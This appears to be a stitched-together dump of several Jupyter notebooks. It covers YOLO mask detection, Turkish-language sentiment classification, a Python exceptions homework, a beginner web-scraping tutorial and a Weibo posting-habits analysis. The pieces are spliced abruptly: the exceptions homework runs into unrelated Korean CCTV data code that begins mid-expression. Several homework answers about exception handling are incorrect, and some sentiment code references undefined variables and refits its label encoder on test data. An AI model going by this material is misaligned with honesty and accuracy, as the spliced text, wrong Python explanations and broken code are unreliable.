# #### <font color="blue">12.4 Scenario 4</font>
#
# Testing with several people walking trough the plaza.
# + colab={"base_uri": "https://localhost:8080/", "height": 573} colab_type="code" executionInfo={"elapsed": 14481, "status": "ok", "timestamp": 1591425557805, "user": {"displayName": "Rangel Alvarado", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GgrnIdLDrC0TrgBX38dBKASDPlPC_cVM2-325_j=s64", "userId": "11539925403577826856"}, "user_tz": 300} id="Iu9qUtq8hKhj" outputId="3c5a0672-3f94-4f75-d0fa-48b5bf9accf5"
# !darknet\darknet detector test $yolo_setup $yolo_test $yolo_best_weights FacialMaskDetector\test\test-image4.jpg -thresh .6 2 > NUL
# -
display_output(test_files[3])
# + [markdown] colab_type="text" id="2vpI_A3t89Ce"
# #### <font color="blue">10.5 Scenario 5</font>
#
# Testing over a video of people wearing or not wearing mask, good lighting conditions. Probably will take between 1.5 to 3 min for generate the video.
# -
# !darknet\darknet detector demo $yolo_setup $yolo_test $yolo_best_weights FacialMaskDetector\test\test-video1.mp4 -thresh .6 2 -out_filename out-vid1.avi -dont_show
Audio(sound_file, autoplay=True)
# + [markdown] colab_type="text" id="G-OEDvCI9Itt"
# #### <font color="blue">10.6 Scenario 6</font>
#
# A video of the crowd. Variable ligth conditions. The video will be generated between 5 to 7 minutes.
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} colab_type="code" executionInfo={"elapsed": 22044271, "status": "ok", "timestamp": 1591424806273, "user": {"displayName": "Rangel Alvarado", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GgrnIdLDrC0TrgBX38dBKASDPlPC_cVM2-325_j=s64", "userId": "11539925403577826856"}, "user_tz": 300} id="ojE1UrTQlxOi" outputId="d6143da1-51c1-48d8-d426-19212387b2b7"
# !darknet\darknet detector demo $yolo_setup $yolo_test $yolo_best_weights FacialMaskDetector\test\test-video2.mp4 -thresh .6 2 -out_filename out-vid2.avi -dont_show
Audio(sound_file, autoplay=True)
# -
# Finally, move the two videos to the result folder
# !powershell -c "Move-Item out-vid1.avi FacialMaskDetector\\result\\yolov4\\"
# !powershell -c "Move-Item out-vid2.avi FacialMaskDetector\\result\\yolov4\\"
# + [markdown] colab_type="text" id="eJz2J3-r6BSD"
# ### <font color="blue">13. Conclusion</font>
#
# This concludes the yolo v3 training and inference google colab notebook.
#
# The disadvantage of GPU for large training datasets will leave you to wait the availability of free GPUs on the cloud (Colab/Kaggle).
#
# There are other alternatives like Azure, Watson and Amazon Web Services, but those ones charge you by GPU usage over time.
#
# For this and other reasons people like to build their "low cost" deep learning rig to prepare their trainers.
#
# If you like to retrain, you could always start with the final weights and retrain over it, continuing with the last point of training will converge faster to your solution.
#
#
| 27,696 |
/udemy_data_science/text_data_mining/.ipynb_checkpoints/nlp_end_to_end-checkpoint.ipynb
|
4b0955fdbc3737bd9156cb5fede1ae3dedb0a390
|
[] |
no_license
|
abdullahbodur/ai-journey
|
https://github.com/abdullahbodur/ai-journey
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 67,545 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# ## Sentiment Analizi & Sınıflandırma Problemleri
# +
from textblob import TextBlob
from sklearn import model_selection, preprocessing, linear_model, naive_bayes, metrics
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
from sklearn import decomposition, ensemble
import pandas, xgboost, numpy, textblob, string
from keras.preprocessing import text, sequence
from keras import layers, models, optimizers
from warnings import filterwarnings
filterwarnings('ignore')
# -
import pandas as pd
data = pd.read_csv('train.tsv',sep='\t')
data.head()
# #### Yapacaklarımız
#
# Verisetinde hazır sentiment değişkeni oluşturulmuş. Biz bu değişken olmasaydı bile kendimiz bunu oluşturacaktık. <br>
#
# * Sentiment değişkenini oluşturma
#
# Hazır oluşturulmuş sentiment 0-4 arasında değer almakta... <br><br>
#
# 0-1 : kötü yorum skorları<br>
# 2 : orta sınıf <br>
# 3-4 : iyi yorum skoraları<br><br>
#
# * biz bu aralığı negative-positive taglemesi yapacağız....<br>
# #### NEG-POS Taglemesi
# +
# negatifler
# -
data['Sentiment'].replace(0,value = 'negative',inplace=True)
data['Sentiment'].replace(1,value = 'negative',inplace=True)
# +
# pozitifler
# -
data['Sentiment'].replace(3,value = 'positive',inplace=True)
data['Sentiment'].replace(4,value = 'positive',inplace=True)
# +
# 2 değerini dışarıda bırakalım.....
# -
data = data[data.Sentiment != 2]
data.head()
# +
# kontrol edelim
# -
data.groupby('Sentiment').count()
# +
# metini ön işlemeden önce dataframe i 2 değişkene indirgeyelim...
# -
df = pd.DataFrame()
df['text'] = data['Phrase'].copy()
df['label'] = data['Sentiment'].copy()
df.head()
# #### Metin Ön İşleme
# +
# lower
df['text'] = df['text'].apply(lambda x : x.lower())
# noktalama işaretleri
df['text'] = df['text'].str.replace('[^\w\s]','')
# sayılar
df['text'] = df['text'].str.replace('\d','')
# stopwords
import nltk
from nltk.corpus import stopwords
sw = stopwords.words('english')
df['text'] = df['text'].apply(lambda x : ' '.join(word for word in x.split() if word not in sw))
# seyreklerinin silinmesi
sprase_word = pd.Series(' '.join(df['text']).split()).value_counts()[-1000:]
df['text'] = df['text'].apply(lambda x : ' '.join(word for word in x.split() if word not in sprase_word))
# lemmi
from textblob import Word
df['text'] = df['text'].apply(lambda x : ' '.join(Word(w).lemmatize() for w in x.split()))
# -
df.head()
# ## Değişken Mühendisliği (Feature Engineering)
# Amaç bir texti makine öğrenimine sokabilmek için gereken sayısal verileri üretmektir. <br>
#
# * Count Vectors (bütün gözlemlerdeki unique kelimeler bir değişken olarak atanır ve gözlemlerde görülme sıklığı incelenir.)
# * TF-IDF Vectors (***words ,characters, n-grams***)
# * Word Embeddings (bütün kelimelerden bir kelime uzayı çıkartılıp gözlemin kelime yoğunluğu hesaplanır. [wiki](https://en.wikipedia.org/wiki/Word_embedding))
#
# TF(t) = (Bir t teriminin bir dökümanda gözlenme frekansı) / (dökümandaki toplam terim sayısı) <br>
#
# IDF(t) = log_e(Toplam döküman sayısı / içeride t terimi olan belge sayısı)<br>
# ### Test-Train
train_x, test_x , train_y ,test_y = model_selection.train_test_split(df['text'],df['label'])
train_x[:2]
# +
# encoder ile y değerlerini 0-1 olarak atama
# -
encoder = preprocessing.LabelEncoder()
train_y = encoder.fit_transform(train_y)
test_y = encoder.fit_transform(test_y)
train_y[:10]
test_y[:10]
# ### Count Vectors
vectorizer = CountVectorizer()
vectorizer.fit(train_x)
# +
# count yöntemiyle oluşturulmuş train_x
# -
train_x_count = vectorizer.transform(train_x)
test_x_count = vectorizer.transform(test_x)
# +
# sonucu görmek için
# -
# her bir unique kelime bir değişken olarak atandığından get_feature_names bize bu ***değişkenlerin adlarını*** vericek...
vectorizer.get_feature_names()[:5]
# bu unique değerlerin gözlemde olup olmama değerini (0-1) gösteren matrix
train_x_count.toarray()
# ### TF-IDF
tf_idf_word_vectorizer = TfidfVectorizer()
tf_idf_word_vectorizer.fit(train_x)
# #### word level TF-IDF
x_train_tf_idf_word = tf_idf_word_vectorizer.transform(train_x)
x_test_tf_idf_word = tf_idf_word_vectorizer.transform(test_x)
# +
# future names
# -
tf_idf_word_vectorizer.get_feature_names()[:5]
# +
# matrix
# -
x_train_tf_idf_word.toarray()
# #### N-Gram Level TF-IDF
# TF-IDF algoritmasını N-gram kullanarak oluşturma
tf_idf_ngram_vectorizer = TfidfVectorizer(ngram_range=(2,3))
tf_idf_ngram_vectorizer.fit(train_x)
x_train_tf_idf_ngram = tf_idf_ngram_vectorizer.transform(train_x)
x_test_tf_idf_ngram = tf_idf_ngram_vectorizer.transform(test_x)
# +
# future names
# -
tf_idf_word_vectorizer.get_feature_names()[:5]
# +
# matrix
# -
x_train_tf_idf_word.toarray()
# #### Character Level TF-IDF
tf_idf_char_vectorizer = TfidfVectorizer(analyzer='char',ngram_range=(2,3))
tf_idf_char_vectorizer.fit(train_x)
x_train_tf_idf_char = tf_idf_char_vectorizer.transform(train_x)
x_test_tf_idf_char = tf_idf_char_vectorizer.transform(test_x)
# +
# future names
# -
tf_idf_char_vectorizer.get_feature_names()[:5]
# +
# matrix
# -
x_train_tf_idf_char.toarray()
# ## Makine Öğrenmesi ile Sentiment Sınıfladırması
# Farklı Classification Modelleri ile denemeler yapacağız.
# ### Lojistik Regresyon
# #### Count-Vectors
# +
loj = linear_model.LogisticRegression()
loj_model = loj.fit(train_x_count,train_y)
accuracy = model_selection.cross_val_score(loj_model,
test_x_count,
test_y,
cv=10).mean()
print('Count Vectors Doğruluk Oranı : ',accuracy)
# -
# #### Word-Level TF-IDF
# +
loj = linear_model.LogisticRegression()
loj_model = loj.fit(x_train_tf_idf_word,train_y)
accuracy = model_selection.cross_val_score(loj_model,
x_test_tf_idf_word,
test_y,
cv=10).mean()
print('Count Vectors Doğruluk Oranı : ',accuracy)
# -
# #### N-Gram TF-IDF
# +
loj = linear_model.LogisticRegression()
loj_model = loj.fit(x_train_tf_idf_ngram,train_y)
accuracy = model_selection.cross_val_score(loj_model,
x_test_tf_idf_ngram,
test_y,
cv=10).mean()
print('Count Vectors Doğruluk Oranı : ',accuracy)
# -
# #### Char-Level TF-IDF
# +
loj = linear_model.LogisticRegression()
loj_model = loj.fit(x_train_tf_idf_char,train_y)
accuracy = model_selection.cross_val_score(loj_model,
x_test_tf_idf_char,
test_y,
cv=10).mean()
print('Count Vectors Doğruluk Oranı : ',accuracy)
# -
# ### Naive Bayes
# #### Count Vectors
# +
nb = naive_bayes.MultinomialNB()
nb_model = nb.fit(train_x_count,train_y)
accuracy = model_selection.cross_val_score(nb_model,
test_x_count,
test_y,
cv = 10).mean()
print('Count Vectors Doğruluk Oranı : ',accuracy)
# -
# #### Word-Level TF-IDF Dogruluk Oranı
# +
nb = naive_bayes.MultinomialNB()
nb_model = nb.fit(x_train_tf_idf_word,train_y)
accuracy = model_selection.cross_val_score(nb_model,
x_test_tf_idf_word,
test_y,
cv = 10).mean()
print('Word-Level TF-IDF Doğruluk Oranı : ',accuracy)
# -
# #### N-Gram TF-IDF
# +
nb = naive_bayes.MultinomialNB()
nb_model = nb.fit(x_train_tf_idf_ngram,train_y)
accuracy = model_selection.cross_val_score(nb_model,
x_test_tf_idf_ngram,
test_y,
cv = 10).mean()
print('N-Gram TD-IDF Doğruluk Oranı : ',accuracy)
# -
# #### Char-Level TF-IDF
# +
nb = naive_bayes.MultinomialNB()
nb_model = nb.fit(x_train_tf_idf_char,train_y)
accuracy = model_selection.cross_val_score(nb_model,
x_test_tf_idf_ngram_char,
test_y,
cv = 10).mean()
print('Char-Level TF-IDF Doğruluk Oranı : ',accuracy)
# -
# ### Random Forests
# #### Count Vectors
# +
rf = ensemble.RandomForestClassifier()
rf_model = rf.fit(train_x_count,train_y)
accuracy = model_selection.cross_val_score(rf_model,
test_x_count,
test_y,
cv = 10).mean()
print('Count Vectors Doğruluk Oranı',accuracy)
# -
# #### Word-Level TF-IDF
# +
rf = ensemble.RandomForestClassifier()
rf_model = rf.fit(x_train_tf_idf_word,train_y)
accuracy = model_selection.cross_val_score(rf_model,
x_test_tf_idf_word,
test_y,
cv = 10).mean()
print('Count Vectors Doğruluk Oranı',accuracy)
# -
# #### N-Gram TF-IDF
# +
rf = ensemble.RandomForestClassifier()
rf_model = rf.fit(x_train_tf_idf_ngram,train_y)
accuracy = model_selection.cross_val_score(rf_model,
x_test_tf_idf_ngram,
test_y,
cv = 10).mean()
print('Count Vectors Doğruluk Oranı',accuracy)
# -
# #### Char-Level TF-IDF
# +
rf = ensemble.RandomForestClassifier()
rf_model = rf.fit(x_train_tf_idf_char,train_y)
accuracy = model_selection.cross_val_score(rf_model,
x_test_tf_idf_char,
test_y,
cv = 10).mean()
print('Count Vectors Doğruluk Oranı',accuracy)
# -
# ### XGBoost
# #### Count Vectors
# +
xgb = xgboost.XGBClassifier()
xgb_model = xgb.fit(train_x_count,train_y)
accuracy = model_selection.cross_val_score(xgb_model,
test_x_count,
test_y,
cv = 10).mean()
print('Count Vectors Doğruluk Oranı',accuracy)
# -
# #### Word-Level TF-IDF
# +
xgb = xgboost.XGBClassifier()
xgb_model = xgb.fit(x_train_tf_idf_word,train_y)
accuracy = model_selection.cross_val_score(xgb_model,
x_test_tf_idf_word,
test_y,
cv = 10).mean()
print('Word Level Doğruluk Oranı',accuracy)
# -
# #### N-Gram TF-IDF
# +
xgb = xgboost.XGBClassifier()
xgb_model = xgb.fit(x_train_tf_idf_ngram,train_y)
accuracy = model_selection.cross_val_score(xgb_model,
x_test_tf_idf_ngram,
test_y,
cv = 10).mean()
print('N-Gram Doğruluk Oranı',accuracy)
# -
# #### Char-Level TF-IDF
# +
xgb = xgboost.XGBClassifier()
xgb_model = xgb.fit(x_train_tf_idf_char,train_y)
accuracy = model_selection.cross_val_score(xgb_model,
x_test_tf_idf_char,
test_y,
cv = 10).mean()
print('N-Gram Doğruluk Oranı',accuracy)
# -
# +
# yapılan modellerden lojistik_reg'i seçelim....
# şimdi bunu iş planımıza uygulamamız lazım...
# yani yeni gelen bir yorumun sentiment skorunu çıkarmamız lazım...
# -
# ### Yeni bir yorumu model nesnemize analiz için sokalım....
# Bunun için text değerini ön işlemeye sokmalıyız...
# +
yeni_yorum = pd.Series('This film is very nice and good i like it')
yeni_yorum2 = pd.Series('no, not good look at that shit very bad')
# +
# count vectorizer..
# -
v = CountVectorizer()
# +
# fit etme işlemi train üzerinden olacak...
# -
v.fit(train_x)
# +
# yeni yorumu vektöre transform ettirme
# +
yeni_yorum = v.transform(yeni_yorum)
yeni_yorum2 = v.transform(yeni_yorum2)
# +
# positive algıladı...
# -
loj_model.predict(yeni_yorum)
loj_model.predict(yeni_yorum2)
# +
# negative algıladı
# -
| 12,671 |
/Advance Python Assignment 6.ipynb
|
10ba96b13d842e113f152a434b77e202fc3d8a47
|
[] |
no_license
|
Jayesh199224/Advance-Python-Assignment-6
|
https://github.com/Jayesh199224/Advance-Python-Assignment-6
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 1,928 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
#Q1. Describe three applications for exception processing.
#ans - Three application for exception processing are - 1.try, 2.except, 3.finally
# +
#Q2. What happens if you don't do something extra to treat an exception?
#ans - if we don't do something extra to treat an exception then the code will stuck within the error and it will not proceed further
# +
#Q3. What are your options for recovering from an exception in your script?
#ans- using finally or using your own custom exception are options for recovering from an exception.
# +
#Q4. Describe two methods for triggering exceptions in your script?
#ans- raise and multiple except clause are two methods
# +
#Q5. Identify two methods for specifying actions to be executed at termination time, regardless of whether or not an exception exists.
#ans - else method and finally method
(CCTV_sorted['2014년'] + CCTV_sorted['2015년'] + CCTV_sorted['2016년'])/CCTV_sorted['2013년도 이전'])*100)
CCTV_seoul.sort_values(by='증가율').head()
#CCTV_seoul
#header=2 -> 처음 헤더 2줄 스킵, usecols="B, D, G, J, N" -> 엑셀의 B, D...열을 읽어라
pop_seoul = pd.read_excel('population_in_Seoul.xls', header=2, usecols='B, D,G, J, N')
pop_seoul.head()
# +
# 컬럼명 변경
# DataFrame안의 rename메소드 이용
# 0번컬럼 - 구별 / 1번컬럼 - 인구수 / 2번컬럼 - 한국인 / 3번컬럼 - 외국인 / 4번컬럼 - 고령자
CCTV_seoul.rename(columns={CCTV_seoul.columns[0]: '구별'}, inplace=True)
pop_seoul.rename(columns={pop_seoul.columns[0]: '구별', pop_seoul.columns[1]: '한국인', pop_seoul.columns[2]: '외국인', pop_seoul.columns[3]: '고령자'}, inplace=True)
pop_seoul.head()
# +
# 0번 인덱스행의 데이터는 총합계이므로 필요없다 - 삭제
# 삭제 확인
#'구별'의 데이터값 확인한다
#'구별'의 na값 확인한다
#na값 확인된 행 삭제한다
# 삭제 확인
#drop은 행을 삭제할때 사용하는 명령어
pop_seoul.drop([0], inplace=True) # 0번인덱스의 데이터 삭제
pop_seoul.head()
# +
#외국인비율 열을 추가한다 ; 인구수 대비 외국인 비율을 계산한다
#고령자비율 열을 추가한다 ; 인구수 대비 고령자 비율을 계산한다
#인구수 가장 많은 상위구 5개 조회
#외국인 가장 많은 상위구 5개 조회
#고령자 가장 많은 상위구 5개 조회
made out of cells. A cell can either contain Markdown text - like this one - or code. In the latter you can execute your code. To see what that means, type the following command in the next cell `print("hello world")`.
# + jupyter={"outputs_hidden": true}
# -
# ## Getting started
# Now, let's import the libraries we need to get started with scraping. Type `import requests`, `from bs4 import BeautifulSoup`, `import pandas as pd` and `import csv`.
# + jupyter={"outputs_hidden": true}
# -
# **What's in a name**
# Scraping is the act of automatically downloading selected data from a website. Scraping is also known as web scraping, web harvesting, web data extraction and data scraping. It can be very valueable tool for your newsroom: instead of by hand saving data from the web, you can automate and speed up the process by writing a custom Python program that downloads the information for you.
#
#
#
#
# **What we'll actually will be doing, when I say 'we're scraping a website':**
#
# - tell your computer which site to visit: where do you want to download data from?
# - we'll be using the `requests` library to requests webpages
# - save the webpage (the html-page) to the computer
# - this too will be done with library `requests`
# - from the webpage, select the data you want to have
# - we'll be using `BeautifulSoup` to do this
# - write the selection to a csv-file
# - this is done with the `csv` library
#
# If there is more than 1 page where you want to get data from, you can tell your computer to move on the next page to repeat the process. But that's for another course... :)
#
# # Scraping a website
#
# ## Request webpage
# We'll be scraping a list of [Power Reactors](https://www.nrc.gov/reactors/operating/list-power-reactor-units.html) from the site of the US government. First we need to let our computer know what site we want to visit; than we can request the site using `requests.get('http://website.com')`.
# + jupyter={"outputs_hidden": true}
# -
# If you want your code to become more easily reusable, you can rewrite to:
# Note that `requests.get(url)` doesn't have the url in quotes; it's clear the url is a string by the quotation marks in `url = 'https://www.nrc.gov/reactors/operating/list-power-reactor-units.html'`.
#
# To check if everything went right, we can use simpy type `page`; this will return a response code. Status codes are issued by a server in response to a client's request made to the server. Read more about these code on the [wikipedia page on status codes](). Basically, if you have a 200 response code, the website loaded in just fine.
# ## Parse HTML, select data
# Now that we've got the page, let's parse the htmlpage. To parse is just nerd speak for splitting up the original data in smaller bits. Use `BeautifulSoup(page.content, 'html.parser')`. It's pretty common when scraping, to name the first with BeautifulSoup created file 'soup'. This 'soup' variable will contain all html of the page once we're done.
#
# Off course, if you want to see what is in 'soup', you could type `print(soup)`. (Notice how there are no quotemarks, since the soup we're refering to is a variable that has data stored inside of it and it is not a string. But, when you add `soup` on a new line, the computer will also print your soup. Again: programmers like things short and sweet.
#
# Btw, the library is named after the Beautiful Soup from Alice in Wonderland... Not kidding.
#
# Now, let's make ourselves some soup...
# Next you want to select the table from this soup. Thanks to the BeautifulSoup library, you can do this writing `soup.find('table')`, this command will look for the first `<table>` in the source code of the webpage, also known as our soup.
# Next, let's get all rows in the table. The HTML code for rows in a table is `<tr>`. We can use the BeautifulSoup command `.find_all('tr')` to get all of these rows.
# See how with `.find_all('')` you can find all rows at once, while `.find('')` will just get you the first one of whatever it is your looking for.
#
# Since there is only 1 table on this webpage, you can either use `soup.find_all('tr')` or `table.find_all('tr')`. But if there are two or more tables on one page, the `soup.find_all('tr')` command will get you all rows, from all tables. `table.find_all('tr')` builds upon `soup.find('table')`, which will give you the **first** table; meaning that `table.find_all('tr')` will get all rows from the first table only.
#
# Don't believe me? Let's try and use `soup.find_all('tr')`...
# You see? Exactly the same result. Just remember; whatever assignment you give to your computer, it always refers to the data that is before the `.assignment`. Meaning `soup.find_all('tr')` looks for '`tr`'s' in `soup`, and `table.find_all('tr')` looks for `tr`s in `table`.
#
#
# Now let's say that you are especially interested in the 21st row. What do you do? Since computers start counting at zero, you should ask it for row 20 to get to see the 21st row. And since you saved all rows in the `rows` variable, you can actually say 'dear computer, give me row 20' by typing `rows[20]`.
# Looking at this row, do you recognize the different cells? Every cell starts with `<td>`, the HTML abbrevation for table data. You can use BeautifulSoup to look for all `td`'s in this 21st row by typing: `rows.find_all('td')`.
# Just for your information: you can even save the data from the `td`'s to a variable called cells, simply type ` cells = rows[21].find_all('td')`
# Now that you know how to only select 1 certain row, you can probably guess how to select a data cell. Exactly, use `cells[0]` to get the first cell of `cells`.
# It works, but it doesn't look too good, does it? Let's get rid of the HTML bits and pieces around our data. Add `.text` to get the job done.
# Looks much better, doesn't it?
#
# Unfortunately, there are too many rows in this table to get each cell like we got `Comanche Peak 105000445`. We'll going to have to automate it. Luckily this is one of the big benefits of programming.
#
# Here's what we're going to do:
# 1. create an empty list to be used later
# 2. extract the table from our soup, save it to the `table` variable
# 3. 'loop over' our table....
# 4. ...to save the data we need for each row in the table
# 5. add the selected data to the list
# 6. print the list
#
# At step 3 we'll 'loop over' the table. What does it mean? Well, using a for loop as its called means that we'll give our computer an assignment and have it done **for** every something. It's like your mum when she told you to treat your friends with candy: **for every one of your friend, give them a piece of candy** It's shorter than naming all your friends one by one and repeating the assignment time and time again, right? We're doing exactly the same by telling our computer: **for every row in the table, get the data inside the cells**.
# Congrats! You just wrote your very first scraper - well done!
#
# ## Saving the scraped data
#
# Now, off course having your data printed inside the notebook is nice. But it would be even beter to store the data in a CSV file. Remember that I explained what we'd actually be doing? Off course things are a bit more complicated; let me explain. Here's what I told you before:
#
# - tell your computer which site to visit: where do you want to download data from?
# - we'll be using the `requests` library to requests webpages
# - save the webpage (the html-page) to the computer
# - this too will be done with library `requests`
# - from the webpage, select the data you want to have
# - we'll be using `BeautifulSoup` to do this
# - write the selection to a csv-file
# - this is done with the `csv` library
#
# Here's what the code will actually do:
# 1. Create a CSV file to save data in
# 2. Create a CSV writer to write data with to the CSV file
# 3. Tell your computer which site(s) to visit
# 4. Get the webpage
# 5. Select data from the webpage
# 6. Write data with the CSV writer to the CSV file
# 7. Save file
#
# ## Save data to CSV
#
# Here's how to save data to a CSV file using the CSV library - the process involves a couple steps:
# 1. create a file, open it, make sure it's 'writeable', use `open('filename.csv', 'w', encoding='utf8', newline='')`
# 2. create a writer, you'll need a writer if you want to write data to the file, use `csv.writer(filename, delimiter=',')`
# 3. write data to the file using the writer, use `writer.writerow([data])`
#
# Off course you can repeat step 3 as often as necessary.
# Using the `ls` command you can see that a new file was created.
# ## The scraper
# Before we broke our essay scraper into sentences before. Now I'll be putting all these sentences together. This way, you can get a good overview of what a scraper could look like. Here's a list of what we need to do, in the exact order:
# 1. Create a CSV file, open it, make it writeable
# 2. Create a CSV writer to write data
# 3. Write the column headers to the file
# 4. Tell your computer which site(s) to visit
# 5. Get the webpage
# 6. Select data from the webpage
# 7. Write data with the CSV writer to the CSV file
# 8. Save file
# + jupyter={"outputs_hidden": true}
# -
# If you want to check if everything worked as it's supposed to, you can import the ScrapedData.csv file as a dataframe using `pd.read_csv('filename.csv')`. Look at the dataframe to see if there's data in the file. Using `df.shape` you can even quickly check if there is as much data in the file as you'd expect.
# `df.shape` will give you the number of rows and columns of the dataframe. A quick way to check if really everything that should be in the CSV file is there.
# Note that the headers are in the dataset twice:
# while scraping we added header; but we also scraped the headers since the headers are in the first row of the table and we scraped all table rows...
#
# Now what?
#
# You can easily delete a row by using ``df.drop(df.index[N])``, to drop the Nth row by index number.
#
# To make sure you get the index number right, why not print the first rows once more? We're in a notebook after all... You can use ``df.head()``
# Looking at these first 5 rows, you'll find that you want to delete the row with indexnumber 0. As stated before, you can use ``df.drop``. By default Pandas will create and return a copy of your dataset, and delete the row of your choosing in that copy. This means that the original will still include dropped row.
#
# Consider this a safety belt when deleting data using Pandas. ;)
# To delete the first row in the original dataset - and not in a copy that Pandas will return to you; you'll need to use ``inplace=True``. The full command becomes: ``df.drop(df.index[0], inplace=True)``.
#
# ``inplace=True`` will delete the row in the original dataset, and won't return anything. Try it:
# To see that it worked, request the head of the dataframe...
# If you want to you can save this cleaned version, by using ``df.to_csv()``...
# Well done, happy web scraping!
| 13,223 |
/Visualization.ipynb
|
c5734d5ec1b0aa8b9d0db8efec1d114a5422f4e0
|
[
"MIT"
] |
permissive
|
luochang212/weibo-analysis
|
https://github.com/luochang212/weibo-analysis
| 1 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 40,934 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import numpy as np
import csv
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib
from ipywidgets import interact
import seaborn as sns
import os
import os.path
class PrettySentences:
def split(self, file):
with open(file, encoding="utf8") as cur_file:
txt = cur_file.read()
txt = str(txt)
txt = txt.split("Read")
return txt
def classification(self, txt_array, file_index):
id = np.array([])
date = np.array([])
time = np.array([])
device = np.array([])
content = np.array([])
count = 0
for ite in range(1, np.size(txt_array), 1):
if txt_array[ite].find("\n"+"YOUR_NAME") != -1:
cur_sentence = txt_array[ite][txt_array[ite].rfind("\n"+"YOUR_NAME") + len("\n"+"YOUR_NAME")+1:txt_array[ite].find("\u200b")]
count += 1
id = np.append(id, str(file_index) + '.' + str(count))
device = np.append(device, cur_sentence[cur_sentence.find("come from") + 10:].split("\n")[0])
content = np.append(content, str(cur_sentence[cur_sentence.find("\n") + 1:]))
if cur_sentence != '':
start = cur_sentence[0:11].rfind("-")
end = cur_sentence[0:16].rfind(":")
date = np.append(date, cur_sentence[0:start+3])
time = np.append(time, cur_sentence[end-2:end+3])
else:
date = np.append(date, '')
time = np.append(time, '')
flag = 0
if count != len(time):
print("Error: time and sentence do not have same size in file {}".format(str(file_index)))
flag = 1
if count != len(device):
print("Error: device and sentence do not have same size in file {}".format(str(file_index)))
flag = 1
if count != len(content):
print("Error: content and sentence do not have same size in file {}".format(str(file_index)))
flag = 1
if flag == 1:
id = np.array([])
date = np.array([])
time = np.array([])
device = np.array([])
content = np.array([])
return id, date, time, device, content
def write_csv(all_weibo):
id, date, time, device, content = zip(*all_weibo)
id = np.array(id).flatten()
date = np.array(date).flatten()
time = np.array(time).flatten()
device = np.array(device).flatten()
content = np.array(content).flatten()
with open('weibo.csv', "w", encoding="utf8") as csvFile: # wb
writer = csv.writer(csvFile)
# write the title of csv file
writer.writerow(['id', 'date', 'time', 'device', 'content'])
# write the elements of weibo
for i in range(len(id)):
row = [id[i], date[i], time[i], device[i], content[i]]
writer.writerow(row)
csvFile.close()
def test():
instance = PrettySentences()
txt = instance.split("1001030102/source/2")
txt_array = np.array(txt)
print(txt_array)
# _id, _date, _time, _device, _content = instance.classification(txt_array, 2)
# print(_content)
def main():
file_number = 58 # len([name for name in os.listdir("208999251/source")])
paths = ["data/" + str(x) for x in range(1, file_number+1)]
id = np.array([])
date = np.array([])
time = np.array([])
device = np.array([])
content = np.array([])
for i in range(file_number):
instance = PrettySentences()
txt = instance.split(paths[i])
txt_array = np.array(txt)
_id, _date, _time, _device, _content = instance.classification(txt_array, i+1)
id = np.append(id, _id)
time = np.append(time, _time)
date = np.append(date, _date)
device = np.append(device, _device)
content = np.append(content, _content)
all_weibo = zip(id, date, time, device, content)
write_csv(all_weibo)
if __name__ == '__main__':
main()
# -
data = pd.read_csv('weibo.csv')
# +
dates = np.array([str(x) for x in data.date])
new_dates = np.matrix([])
new_year = np.array([])
new_month = np.array([])
new_ite = np.array([])
ite = 0
def is_year(string):
if string.find('2013') != -1:
return '2013'
elif string.find('2014') != -1:
return '2014'
elif string.find('2015') != -1:
return '2015'
elif string.find('2016') != -1:
return '2016'
else:
return '2017'
for date in dates:
if date.find('-') != -1:
new_ite = np.append(new_ite, str(ite))
ite += 1
year = str(is_year(date).replace("-", ""))
new_year = np.append(new_year, year)
for date in dates:
if date.find('-') != -1:
if is_year(date) == '2017':
month = str(date[0:date.find("-")].replace(" ", ""))
else:
month = str(date[date.find("-"):date.find("-")+3].replace("-", "").replace(" ", ""))
new_month = np.append(new_month, month)
if len(new_year) == len(new_month):
new_dates = np.c_[new_ite, new_year, new_month]
else:
print("Error: The size of array is not the same.")
new_dates.shape[0]
# +
year_group = '2013', '2014', '2015', '2016', '2017'
month_group = 'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sept', 'Oct', 'Nov', 'Dec'
values = np.zeros((len(year_group),len(month_group)))
for i in range(new_dates.shape[0]):
for year in range(len(year_group)):
for month in range(len(month_group)):
if new_dates[i, 1] == year_group[year] and new_dates[i, 2] == str(month+1):
values[year, month] += 1
ax = sns.heatmap(values, xticklabels=month_group, yticklabels=year_group, cmap='YlGnBu', cbar_kws={'label': 'Heat Map'})
ax.set(xlabel='Month', ylabel='Year Group')
# -
devices = np.array([str(x) for x in data.device])
new_device = np.array([])
for device in devices:
if device.find('华为Ascend P7') != -1 or device.find('华为麦芒4') != -1 or device.find('微博 weibo.com') != -1 \
or device.find('网易云音乐') != -1 or device.find('Android') != -1:
if device.find('华为Ascend P7')!= -1:
new_device = np.append(new_device, '华为Ascend P7')
elif device.find('华为麦芒4') != -1:
new_device = np.append(new_device, '华为麦芒4')
elif device.find('微博 weibo.com') != -1:
new_device = np.append(new_device, '微博 weibo.com')
elif device.find('网易云音乐') != -1:
new_device = np.append(new_device, '网易云音乐')
elif device.find('Android') != -1:
new_device = np.append(new_device, 'Android')
np.size(new_device)
# +
plt.hist(new_device, bins=5, facecolor="blue", edgecolor="black")
matplotlib.rcParams['font.sans-serif']=['SimHei']
plt.xlabel("devices")
plt.ylabel("frequency")
plt.title("Device distribution")
plt.show()
# +
time = [str(x) for x in data.time]
times = np.array([])
for hour in time:
times = np.append(times, hour[0:2])
times = np.array([int(time) for time in times if time != 'na'])
print(np.size(times))
print(times)
# +
